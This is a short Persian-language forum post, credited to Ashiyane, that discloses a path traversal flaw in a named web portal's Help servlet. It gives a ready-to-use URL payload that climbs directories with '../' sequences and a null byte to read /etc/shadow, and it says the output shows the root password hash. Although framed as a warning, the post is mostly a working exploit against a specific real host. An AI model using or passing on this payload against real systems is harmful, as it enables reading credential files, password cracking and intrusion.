دوستان این باگ رو من مدتیه میدونم خواستم بهتون معرفی کنم تا مواظب باشید
کافیه بعد از صفحه لوگین (https://www.cp.ewdx.com/single.html)
این را اضافه کنید: servlet/Help?help_id=1&locale=../../../../../../../../etc/shadow%00
مثال :
میبینید که پسورد hash شده روت رو نشون میدهکد:https://www.cp.ewdx.com/servlet/Help?help_id=1&locale=../../../../../../../../etc/shadow%00
هدف فقط اطلاع رسانی بود
منبع: Ashiyane